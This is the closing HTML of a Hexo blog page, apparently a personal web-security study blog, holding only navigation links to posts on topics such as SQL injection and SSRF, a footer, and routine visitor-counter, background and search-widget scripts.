            <a href="/2026/07/02/RCE/" title="上一篇: RCE">
                <i class="fa fa-angle-left"></i>
            </a>
        
        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>
        
            <a href="/2026/07/02/SQL%E6%B3%A8%E5%85%A5/" title="下一篇: SQL注入">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>
    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2026/07/02/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">php反序列化</a></li><li class="post-list-item"><a class="post-list-link" href="/2026/07/02/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/">文件包含</a></li><li class="post-list-item"><a class="post-list-link" href="/2026/07/02/RCE/">RCE</a></li><li class="post-list-item"><a class="post-list-link" href="/2026/07/02/SSRF/">SSRF</a></li><li class="post-list-item"><a class="post-list-link" href="/2026/07/02/SQL%E6%B3%A8%E5%85%A5/">SQL注入</a></li><li class="post-list-item"><a class="post-list-link" href="/2026/04/12/MyFirstBlog/">MyFirstBlog</a></li></ul>
    <script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
    <script>
        $(".post-list").addClass("toc-article");
        $(".post-list-item a").attr("target","_blank");
        $("#post-nav-button > a:nth-child(2)").click(function() {
            $(".fa-bars, .fa-times").toggle();
            $(".post-list").toggle(300);
            if ($(".toc").length > 0) {
                $("#toc, #tocButton").toggle(200, function() {
                    if ($(".switch-area").is(":visible")) {
                        $("#tocButton").attr("value", valueHide);
                        }
                    })
            }
            else {
            }
        })
    </script>



    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                &copy; 2026 worny
            </div>
            <div class="footer-right">
                Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" >访客数: 
                            <span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span> | </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit">阅读量: 
                            <span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>

<script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    </div>
    <script src="https://cdn.bootcdn.net/ajax/libs/require.js/2.1.6/require.min.js"></script>
<script src="https://cdn.bootcdn.net/ajax/libs/jquery/1.9.1/jquery.min.js"></script>


<script src="/js/main.js"></script>


    <script>
        $(document).ready(function() {
            var backgroundnum = 5;
            var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
            $("#mobile-nav").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
            $(".left-col").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
        })
    </script>







<div class="scroll" id="scroll">
    <a href="#"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments"><i class="fa fa-comments-o"></i></a>
    <a href="#footer"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    $(document).ready(function() {
        if ($("#comments").length < 1) {
            $("#scroll > a:nth-child(2)").hide();
        };
    })
</script>


<script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>




    <script type="text/javascript">
      // 这里的逻辑保持不变，但因为修复了 jQuery，报错会消失
      window.onload = function(){
        var searchBtn = document.getElementById("search");
        if(searchBtn){
            searchBtn.onclick = function(){
                console.log("search");
                search();
            }
        }
      }
      function search(){
        (function(w,d,t,u,n,s,e){w['SwiftypeObject']=n;w[n]=w[n]||function(){
        (w[n].q=w[n].q||[]).push(arguments);};s=d.createElement(t);
        e=d.getElementsByTagName(t)[0];s.async=1;s.src=u;e.parentNode.insertBefore(s,e);
        })(window,document,'script','//s.swiftypecdn.com/install/v2/st.js','_st');
        _st('install','A1Pz-LKMXbrzcFg2FWi6','2.0.0');
      }
    </script>

  </div>
</body>
</html>